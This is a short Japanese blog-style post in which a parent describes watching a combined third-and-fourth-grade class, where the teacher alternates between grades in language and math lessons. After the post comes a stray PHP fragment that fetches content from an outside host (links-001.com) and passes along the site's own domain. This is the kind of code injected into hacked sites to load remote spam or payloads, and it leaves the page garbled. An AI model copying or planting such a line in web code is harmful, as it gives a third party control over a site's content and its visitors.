前へ
次へ

複式学級とはどのように授業をおこなうか

息子が3年生の時にクラスには5人しか生徒がおらず、4年生と合同で授業を行う複式学級になりました。2学年合わせて20人くらいのクラスです。どのように授業を行っているのか参観日を見学しに行ってみると、1つのクラス内で仕切りを作って国語の受領をしていました。先生は3年生にしばらく授業をすると、次は4年生方に移動し授業をするという慌ただしい方法で授業をしていました。どちらか一方の学年を教えている間は、どちらか一方の学年は待ち時間が生まれるので音読したり、グループで相談する時間を設けていました。先生なりに努力されてのことだと思いました。算数の授業を同じ方法を取っていました。理科や社会の時は学年別に授業を行っていて、とても不思議に思いました。小学生の授業で最も大切なのは国語と算数ではないかと考えますが、先生は複式の決められたルールの中で一生懸命頑張ってくれています。先生にも生徒にも優しい教育方法になってくれることを望みます。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top